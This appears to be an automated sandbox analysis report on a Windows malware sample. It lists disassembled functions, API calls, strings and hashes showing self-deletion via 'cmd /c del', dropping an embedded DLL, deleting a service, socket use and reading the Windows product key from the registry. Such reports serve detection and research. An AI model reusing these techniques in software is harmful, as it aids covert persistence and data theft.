                                • String ID: $ $.$E$F$GetSystemDirectoryA$I$KERNEL32.dll$P$\$\$\$a$g$i$i$lstrcatA$lstrcpyA$m$n$n$o$o$o$p$p$s
                                • API String ID: 2574300362-3412716298
                                • Opcode ID: 8249b312c4c04751acff0aaaeb5fd0c636e29cc8b9147592e794b1a22bdd32d1
                                • Instruction ID: 1cc97e3852dfcfcdc61d028ea0c2383468fb858139331ce9ede19e0ea5d9e28d
                                • Opcode Fuzzy Hash: 8249b312c4c04751acff0aaaeb5fd0c636e29cc8b9147592e794b1a22bdd32d1
                                • Instruction Fuzzy Hash: 0041E61114D3C19DE312DA799884A8FBFD55BB6608F481D9EF1C427293C2AAC64CC7BB
                                Function 0040355B Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 117librarythreadloaderCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcatA,00000000,Defghi Klmnopqr Tuv,00000000), ref: 00403571
                                • GetProcAddress.KERNEL32(00000000), ref: 00403578
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004035D3
                                • GetShortPathNameA.KERNEL32(?,?,00000104), ref: 004035E8
                                • GetEnvironmentVariableA.KERNEL32(COMSPEC,?,00000104), ref: 004035FB
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00403675
                                • SetPriorityClass.KERNEL32(?,00000040), ref: 00403689
                                • GetCurrentProcess.KERNEL32(00000100), ref: 00403690
                                • SetPriorityClass.KERNEL32(00000000), ref: 00403697
                                • GetCurrentThread.KERNEL32 ref: 0040369B
                                • SetThreadPriority.KERNEL32(00000000), ref: 004036A2
                                • SHChangeNotify.SHELL32(00000004,00000001,?,00000000), ref: 004036B4
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: Priority$ClassCurrentNameThread$AddressChangeEnvironmentExecuteFileLibraryLoadModuleNotifyPathProcProcessShellShortVariable
                                • String ID: > nul$/c del $<$COMSPEC$Defghi Klmnopqr Tuv$KERNEL32.dll$O$e$lstrcatA$n$p
                                • API String ID: 3227834783-364147672
                                • Opcode ID: bb42670f56283ada0ce27347b1802bba000ccfeec7695c9d886015269e5674b7
                                • Instruction ID: e1efa2a12065ff2590d5ce24305b170e8e226b043a9d1efffb27e628f7bfc04e
                                • Opcode Fuzzy Hash: bb42670f56283ada0ce27347b1802bba000ccfeec7695c9d886015269e5674b7
                                • Instruction Fuzzy Hash: 4B413E72D0125DBFDB118BA4DD48BDEBFBCAB08345F0444B6E209F61A0D6745A88CF64
                                Function 00405244 Relevance: 26.3, APIs: 12, Strings: 3, Instructions: 86filelibrarystringCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryA.KERNEL32(kernel32.dll,SizeofResource), ref: 0040525A
                                • GetProcAddress.KERNEL32(00000000), ref: 00405261
                                • FindResourceA.KERNEL32(?,?,?), ref: 00405272
                                • LoadResource.KERNEL32(?,00000000), ref: 00405291
                                • LockResource.KERNEL32(00000000), ref: 004052A9
                                • wsprintfA.USER32 ref: 004052C4
                                • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 004052E0
                                • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00405300
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00405306
                                • lstrlen.KERNEL32(00401B2C,?,00000000), ref: 00405316
                                • WriteFile.KERNEL32(00000000,00401B30,00000000), ref: 00405323
                                • CloseHandle.KERNEL32(00000000), ref: 00405326
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Resource$LoadWrite$AddressCloseCreateFindHandleLibraryLockPointerProclstrlenwsprintf
                                • String ID: SizeofResource$hra%u.dll$kernel32.dll
                                • API String ID: 1940342438-2774179399
                                • Opcode ID: d84aa10ad67f5b4d4d257d4d4e681f3cfadd9e1c325ffe4c470ab3111da27952
                                • Instruction ID: b3e8c15927428f48014e7fda34fba09b7f25a33c83898dee726e7fdda32e3d2c
                                • Opcode Fuzzy Hash: d84aa10ad67f5b4d4d257d4d4e681f3cfadd9e1c325ffe4c470ab3111da27952
                                • Instruction Fuzzy Hash: 62214171100258BBCB206F71DD8CE9F3F6DEB45790F104432F909A21B0D6B49980CBA4
                                Function 0040588B Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 58sleeplibraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,SetServiceStatus), ref: 00405898
                                • GetProcAddress.KERNEL32(00000000), ref: 0040589F
                                • Sleep.KERNEL32(000001F4), ref: 004058E2
                                • Sleep.KERNEL32(000001F4), ref: 00405926
                                • Sleep.KERNEL32(000001F4), ref: 00405961
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: Sleep$AddressLibraryLoadProc
                                • String ID: ADVAPI32.dll$SetServiceStatus
                                • API String ID: 238394870-1924299548
                                • Opcode ID: f244ac2fdfcf7e27f983d47bd2e476e1663f6f9b5c6e818040c90ec42e299550
                                • Instruction ID: a5c8a0c86872ce331e11fcaa3c45903c56c1e4641523fec5342e9324e04e0236
                                • Opcode Fuzzy Hash: f244ac2fdfcf7e27f983d47bd2e476e1663f6f9b5c6e818040c90ec42e299550
                                • Instruction Fuzzy Hash: 6A1158B1121262DBFB105B16EE4CB573AA6F704319F00803AE544B62B2C7B90C54CF3E
                                Function 0040351A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 25serviceCOMMON
                                Download Yara Rule
                                APIs
                                • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,00404EA9,Defghi Klmnopqr Tuv), ref: 00403523
                                • OpenServiceA.ADVAPI32(00000000,?,000F01FF,00000000,Defghi Klmnopqr Tuv), ref: 00403539
                                • DeleteService.ADVAPI32(00000000), ref: 0040354C
                                • CloseServiceHandle.ADVAPI32(00000000), ref: 00403553
                                • CloseServiceHandle.ADVAPI32(00000000), ref: 00403556
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: Service$CloseHandleOpen$DeleteManager
                                • String ID: Defghi Klmnopqr Tuv
                                • API String ID: 204194956-1553144822
                                • Opcode ID: 9417cfe2cc993b79d2e3b55ebb6b09adf650dad06d9114a354eaf94673a61dfb
                                • Instruction ID: af5df313aa315fefd4782f401c2454f72211a105aee6f81703237d9f712d2b62
                                • Opcode Fuzzy Hash: 9417cfe2cc993b79d2e3b55ebb6b09adf650dad06d9114a354eaf94673a61dfb
                                • Instruction Fuzzy Hash: 20E04F3564166177C2222B256D08F5B3B18AFC1B53F050425F741B65B48B78954195B9
                                Function 00406BD0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 16libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryA.KERNEL32(KERNEL32.dll,GetTickCount,Defghi Klmnopqr Tuv,00404D28,0000001A), ref: 00406BDB
                                • GetProcAddress.KERNEL32(00000000), ref: 00406BE2
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressLibraryLoadProc
                                • String ID: Defghi Klmnopqr Tuv$GetTickCount$KERNEL32.dll
                                • API String ID: 2574300362-1458725802
                                • Opcode ID: 6b3510431a1f1d43bc199626c34209ae12acd185543041aa9819738d571691f0
                                • Instruction ID: e2b8e24bfa267fa6e9ec36e760088df98f66f050865d098ef55141e691ac327e
                                • Opcode Fuzzy Hash: 6b3510431a1f1d43bc199626c34209ae12acd185543041aa9819738d571691f0
                                • Instruction Fuzzy Hash: 69D02272A802129BD30033BADF0FACA7AA99AC83553048037B084F24B4DF38C4404798
                                Function 00403758 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57networkCOMMON
                                Download Yara Rule
                                APIs
                                • select.WS2_32(00000001,?,00000000,00000000,00000000), ref: 00403798
                                • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 004037B1
                                • recv.WS2_32(00000000,?,00000008,00000000), ref: 004037CA
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: recvselect
                                • String ID: Defghi Klmnopqr Tuv
                                • API String ID: 741273618-1553144822
                                • Opcode ID: 9210cb308e33c3465702e112dd41e11aff726b02e6877597e9f704787e0b536c
                                • Instruction ID: d88939a34068f27b08009573b9ec192b3f1388868b9ca5f3c15b88e7a2eb2fcd
                                • Opcode Fuzzy Hash: 9210cb308e33c3465702e112dd41e11aff726b02e6877597e9f704787e0b536c
                                • Instruction Fuzzy Hash: 3711A1F16002146BDB209E688DC5FE67AAC9B043A1F508636FA19E71D0E274DE808B94
                                Function 004067E9 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 56stringCOMMON
                                Download Yara Rule
                                APIs
                                • strcmp.MSVCRT ref: 00406731
                                • GetIfTable.IPHLPAPI(00000000,00000000,00000001), ref: 0040676F
                                • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,KVa7,00000000,?,?,?,00000400,00000000), ref: 0040678E
                                • GetIfTable.IPHLPAPI(00000000,00000000,00000001), ref: 004067C5
                                • sprintf.MSVCRT ref: 004068CD
                                • _mbscpy.MSVCRT(-00000023,?,?,?,?,?,?,?,KVa7,00000000,?,?,?,00000400,00000000), ref: 004068E7
                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000001,?,?,?,KVa7,00000000,?,?,?,00000400,00000000), ref: 0040693E
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: Table$??2@??3@_mbscpysprintfstrcmp
                                • String ID: %u Gbps$KVa7
                                • API String ID: 3420875952-2796686009
                                • Opcode ID: 2e6fa44a5d2f037096ad7b5d024fbd0ea36ba1bcc104164832898df47580a20a
                                • Instruction ID: a7a8e1041bd709416f2cdac98afc023946ef9f584d3dcb890be07267fec2ea1a
                                • Opcode Fuzzy Hash: 2e6fa44a5d2f037096ad7b5d024fbd0ea36ba1bcc104164832898df47580a20a
                                • Instruction Fuzzy Hash: 18210E70A005158BD72ECB04CE94BA9B3BAFB94309F0941FDE10EAB6E5D6356F918F44
                                Function 00402A37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 8libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryA.KERNEL32(WS2_32.dll,htons), ref: 00402A46
                                • GetProcAddress.KERNEL32(00000000), ref: 00402A4D
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressLibraryLoadProc
                                • String ID: WS2_32.dll$htons
                                • API String ID: 2574300362-178149120
                                • Opcode ID: d30d6111be414e93e59afff5acc367f2655241c9da2ea0a2795162f196827327
                                • Instruction ID: 2561ae12f7e90b5fc780e89bc5807c04a20d660f8c717e8047036cfcaa43c05d
                                • Opcode Fuzzy Hash: d30d6111be414e93e59afff5acc367f2655241c9da2ea0a2795162f196827327
                                • Instruction Fuzzy Hash: BBC09BB5551280EBC7006B719F0D5453994B6047017100077F141F15F1DB7800409F1D
                                Function 00408680 Relevance: 6.0, APIs: 4, Instructions: 37networkCOMMON
                                Download Yara Rule
                                APIs
                                • socket.WS2_32(00000002,00000001,00000000), ref: 0040868A
                                • htons.WS2_32 ref: 004086B2
                                • connect.WS2_32(00000000,?,00000010), ref: 004086C5
                                • closesocket.WS2_32(00000000), ref: 004086D1
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: closesocketconnecthtonssocket
                                • String ID:
                                • API String ID: 3817148366-0
                                • Opcode ID: 0a2ed5afde3e2c3bda8bc7a891d523bcba82ca95b19b28c83635fe27b66edda0
                                • Instruction ID: b5f64500789357e91306605df317961a8cc373726e32a30d19d3821c8ed13c85
                                • Opcode Fuzzy Hash: 0a2ed5afde3e2c3bda8bc7a891d523bcba82ca95b19b28c83635fe27b66edda0
                                • Instruction Fuzzy Hash: 02F062349042206BD600EB6C9D46BEB76A4EF89370F804B59FAB9A62E1E775440447DA

                                Executed Functions

                                Function 00433020 Relevance: 531.4, APIs: 35, Strings: 267, Instructions: 2903windowregistrytimeCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00459941: KiUserCallbackDispatcher.NTDLL(?,?), ref: 0045994E
                                  • Part of subcall function 004597B2: GetDlgItem.USER32(?,?), ref: 004597BF
                                • SendMessageA.USER32(?,000000CF,00000001,00000000), ref: 0043308A
                                  • Part of subcall function 004306A0: RegOpenKeyExA.KERNEL32(80000002,80000002,00000000,000F003F,?,?,00402ED4,80000002,SOFTWARE\Microsoft\Internet Explorer\Registration), ref: 004306B5
                                  • Part of subcall function 004306A0: GetLastError.KERNEL32(?,00402ED4,80000002,SOFTWARE\Microsoft\Internet Explorer\Registration), ref: 004306BF
                                • RegQueryValueExA.KERNEL32(00000000,DigitalProductId,00000000,00000000,?,?,00465CDE), ref: 00433117
                                • SystemTimeToVariantTime.OLEAUT32(00263B80,?), ref: 00433856
                                • SendMessageA.USER32(?,0000014B,00000000,00000000), ref: 00433898
                                • SendMessageA.USER32(?,00000143,00000000,(GMT-12:00) International Date Line West), ref: 004338AD
                                • SendMessageA.USER32(?,00000143,00000000,(GMT-11:00) Midway Island), ref: 004338C2
                                • SendMessageA.USER32(?,00000143,00000000,(GMT-10:00) Hawaii), ref: 004338D7
                                • SendMessageA.USER32(?,00000143,00000000,(GMT-09:00) Alaska), ref: 004338EC
                                • SendMessageA.USER32(?,00000143,00000000,(GMT-08:00) Pacific time (US & Canada)), ref: 00433901
                                • SendMessageA.USER32(?,00000143,00000000,(GMT-07:00) Mountain time (US & Canada)), ref: 00433916
                                • SendMessageA.USER32(?,00000143,00000000,(GMT-06:00) Central time (US & Canada)), ref: 0043392B
                                • SendMessageA.USER32(?,00000143,00000000,(GMT-05:00) Eastern time (US & Canada)), ref: 00433940
                                • SendMessageA.USER32(?,00000143,00000000,(GMT-04:00) Atlantic time (Canada)), ref: 00433955
                                • SendMessageA.USER32(?,00000143,00000000,(GMT-03:00) Brasilia), ref: 0043396A
                                • SendMessageA.USER32(?,00000143,00000000,(GMT-02:00) Mid-Atlantic), ref: 0043397F
                                • SendMessageA.USER32(?,00000143,00000000,(GMT-01:00) Cape Verde Is.), ref: 00433994
                                • SendMessageA.USER32(?,00000143,00000000,(GMT+00:00) Greenwich Mean Time), ref: 004339A9
                                • SendMessageA.USER32(?,00000143,00000000,(GMT+01:00) West Central Africa), ref: 004339BE
                                • SendMessageA.USER32(?,00000143,00000000,(GMT+02:00) Vilius, Jerusalem), ref: 004339D3
                                • SendMessageA.USER32(?,00000143,00000000,(GMT+03:00) Baghdad, Moscow), ref: 004339E8
                                • SendMessageA.USER32(?,00000143,00000000,(GMT+04:00) Abu Dhabi), ref: 004339FD
                                • SendMessageA.USER32(?,00000143,00000000,(GMT+05:00) Islamabad), ref: 00433A12
                                • SendMessageA.USER32(?,00000143,00000000,(GMT+06:00) Almaty), ref: 00433A27
                                • SendMessageA.USER32(?,00000143,00000000,(GMT+07:00) Bangkok, Hanoi, Krasnoyask), ref: 00433A3C
                                • SendMessageA.USER32(?,00000143,00000000,(GMT+08:00) Beijing, Hong Kong), ref: 00433A51
                                • SendMessageA.USER32(?,00000143,00000000,(GMT+09:00) Seoul, Tokyo), ref: 00433A66
                                • SendMessageA.USER32(?,00000143,00000000,(GMT+10:00) Brisbane, Melbourne, Sydney), ref: 00433A7B
                                • SendMessageA.USER32(?,00000143,00000000,(GMT+11:00) Solomon Is.), ref: 00433A90
                                • SendMessageA.USER32(?,00000143,00000000,(GMT+12:00) Fiji), ref: 00433AA5
                                • GetTimeZoneInformation.KERNEL32(?), ref: 00433AAF
                                • SendMessageA.USER32(?,0000014E,-0000000C,00000000), ref: 0043432F
                                • SendMessageA.USER32(?,0000014B,00000000,00000000), ref: 00435143
                                • SendMessageA.USER32(?,00000143,00000000,?), ref: 0043518C
                                • RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020019,?), ref: 0043520B
                                • SendMessageA.USER32(?,0000014E,FFFFFFFF,00000000), ref: 0043545D
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: MessageSend$Time$Open$CallbackDispatcherErrorInformationItemLastQuerySystemUserValueVariantZone
                                • String ID: !$#$$$%$&$($(GMT$(GMT+$(GMT+00:00) Greenwich Mean Time$(GMT+01:00) West Central Africa$(GMT+02:00) Vilius, Jerusalem$(GMT+03:00) Baghdad, Moscow$(GMT+04:00) Abu Dhabi$(GMT+05:00) Islamabad$(GMT+06:00) Almaty$(GMT+07:00) Bangkok, Hanoi, Krasnoyask$(GMT+08:00) Beijing, Hong Kong$(GMT+09:00) Seoul, Tokyo$(GMT+10:00) Brisbane, Melbourne, Sydney$(GMT+11:00) Solomon Is.$(GMT+12:00) Fiji$(GMT-01:00) Cape Verde Is.$(GMT-02:00) Mid-Atlantic$(GMT-03:00) Brasilia$(GMT-04:00) Atlantic time (Canada)$(GMT-05:00) Eastern time (US & Canada)$(GMT-06:00) Central time (US & Canada)$(GMT-07:00) Mountain time (US & Canada)$(GMT-08:00) Pacific time (US & Canada)$(GMT-09:00) Alaska$(GMT-10:00) Hawaii$(GMT-11:00) Midway Island$(GMT-12:00) International Date Line West$)$0000$00000401$00000402$00000404$00000405$00000406$00000407$00000408$00000409$0000040B$0000040C$0000040D$0000040E$00000410$00000411$00000412$00000413$00000414$00000415$00000416$00000418$00000419$0000041A$0000041B$0000041C$0000041D$0000041E$0000041F$00000421$00000422$00000423$00000424$00000425$00000426$00000427$00000429$0000042A$00000439$0000043E$0000043F$00000440$00000441$0000044B$00000450$0000045A$00000465$00000801$00000804$00000807$00000809$0000080A$0000080C$00000810$00000813$00000816$0000081A$0000081D$0000083E$00000C01$00000C04$00000C07$00000C09$00000C0A$00000C0C$00000C1A$00001001$00001004$00001007$00001009$0000100A$0000100C$00001401$00001404$00001407$00001409$0000140A$0000140C$00001801$00001809$0000180A$0000180C$00001C01$00001C09$00001C0A$00002001$00002009$0000200A$00002401$00002409$0000240A$00002801$00002809$0000280A$00002C01$00002C09$00002C0A$00003001$00003009$0000300A$00003401$00003409$0000340A$00003801$0000380A$00003C01$00003C0A$00004001$0000400A$0000440A$0000480A$00004C0A$0000500A$:00) $Albanian(Albania)$Arabic(Algeria)$Arabic(Bahrain)$Arabic(Egypt)$Arabic(Iraq)$Arabic(Jordan)$Arabic(Kuwait)$Arabic(Lebanon)$Arabic(Libya)$Arabic(Morocco)$Arabic(Oman)$Arabic(Qatar)$Arabic(Saudi Arabia)$Arabic(Syria)$Arabic(Tunisia)$Arabic(United Arab Emirates)$Arabic(Yemen)$BCDFGHJKMPQRTVWXY2346789$Belarusian(Belarus)$Bulgarian(Bulgaria)$C$Chinese(China)$Chinese(Hong Kong SAR)$Chinese(Macau SAR)$Chinese(Singapore)$Chinese(Taiwan)$Croatian(Croatia)$Czech(Czech Republic)$Danish(Denmark)$Default$Dhivehi(Maldives)$DigitalProductId$Dutch(Belgium)$Dutch(The Netherlands)$English(Australia)$English(Belize)$English(Canada)$English(Caribbean)$English(Ireland)$English(Jamaica)$English(New Zealand)$English(Philippines)$English(South Africa)$English(Trinidad and Tobago)$English(United Kingdom)$English(United States)$English(Zimbabwe)$Estonian(Estonia)$Farsi(Iran)$Finnish(Finland)$French(Belgium)$French(Canada)$French(France)$French(Luxembourg)$French(Monaco)$French(Switzerland)$German(Austria)$German(Germany)$German(Liechtenstein)$German(Luxembourg)$German(Switzerland)$Greek(Greece)$Hebrew(Israel)$Hindi(India)$Hungarian(Hungary)$Indonesian(Indonesia)$InstallDate$Italian(Italy)$Italian(Switzerland)$Japanese(Japan)$Kannada(India)$Kazakh(Kazakhstan)$Korean(Korea)$Kyrgyz(Kazakhstan)$Latvian(Latvia)$Lithuanian(Lithuania)$Malay(Brunei)$Malay(Malaysia)$Mongolian(Mongolia)$Norwegian(Norway)$Polish(Poland)$Portuguese(Brazil)$Portuguese(Portugal)$Romanian(Romania)$Russian(Russia)$SOFTWARE\Microsoft\Windows NT\CurrentVersion$SYSTEM\CurrentControlSet\Control\Keyboard Layouts\$SYSTEM\CurrentControlSet\Control\Nls\Language$Serbian(Cyrillic)$Serbian(Latin)$Slovak(Slovakia)$Slovenian(Slovenia)$Spanish(Argenuser)$Spanish(Bolivia)$Spanish(Chile)$Spanish(Colombia)$Spanish(Costa Rica)$Spanish(Dominican Republic)$Spanish(Ecuador)$Spanish(El Salvador)$Spanish(Guatemala)$Spanish(Honduras)$Spanish(Mexico)$Spanish(Nicaragua)$Spanish(Panama)$Spanish(Paraguay)$Spanish(Peru)$Spanish(Puerto Rico)$Spanish(Spain)$Spanish(Uruguay)$Spanish(Venezuela)$Swahili(Kenya)$Swedish(Finland)$Swedish(Sweden)$Syriac(Syria)$Thai(Thailand)$Turkish(Turkey)$Ukrainian(Ukraine)$Vietnamese(Vietnam)$wwww
                                • API String ID: 3508335397-1490658257
                                • Opcode ID: 627a35e1b08555edaf0af8ad1688b17534d88a004a0355c9889eb5397b03b424
                                • Instruction ID: 11e6bca3a7b78fddd481d42fe835fe7653ca2f41bf506d87efe11ac05451b3a8
                                • Opcode Fuzzy Hash: 627a35e1b08555edaf0af8ad1688b17534d88a004a0355c9889eb5397b03b424
                                • Instruction Fuzzy Hash: 7233E275300B00AFC354DF2DC895F5A73E5AFC8718F10861EF85A9B2D2CB78A9468B59
                                Function 00405260 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 220fileCOMMON
                                Download Yara Rule
                                APIs
                                • FindFirstFileA.KERNEL32(?,?,\*.*,00000004,?,?), ref: 0040530E
                                • GetFileAttributesA.KERNEL32(?,?,?,0000005C,?,?), ref: 00405423
                                • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405432
                                • RemoveDirectoryA.KERNEL32(?), ref: 0040544C
                                • DeleteFileA.KERNEL32(?), ref: 0040547E
                                • FindNextFileA.KERNEL32(?,?), ref: 0040548E
                                • FindClose.KERNEL32(?), ref: 004054A1
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
